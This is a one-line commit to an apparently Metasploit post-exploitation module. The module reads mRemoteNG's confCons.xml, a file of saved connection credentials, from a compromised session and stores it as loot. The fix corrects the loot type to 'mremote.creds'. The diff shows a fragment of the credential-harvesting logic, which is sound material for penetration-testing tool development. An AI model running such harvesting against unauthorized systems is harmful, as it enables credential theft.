Fix store_loot OID

It's supposed to be a loot type, not the filename (now stored).
GSoC/Meterpreter_Web_Console
William Vu 2018-09-10 15:14:38 -05:00
parent 0072d9b9b1
commit 93a73f5e71
1 changed files with 1 additions and 1 deletions

View File

@ -50,7 +50,7 @@ class MetasploitModule < Msf::Post
begin
if file_exist?(path)
condata = read_file(path)
loot_path = store_loot('confCons.xml', 'text/xml', session, condata)
loot_path = store_loot('mremote.creds', 'text/xml', session, condata, path)
vprint_good("confCons.xml saved to #{loot_path}")
parse_xml(condata)
print_status("Finished processing #{path}")